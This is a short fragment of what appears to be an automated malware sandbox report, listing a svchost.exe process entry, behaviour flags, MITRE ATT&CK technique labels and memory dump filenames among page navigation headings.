C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2436

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2436-130-0x00000226F9390000-0x00000226F93A0000-memory.dmp

Filesize
64KB

Download
memory/2436-137-0x00000226FC010000-0x00000226FC014000-memory.dmp

Filesize
16KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads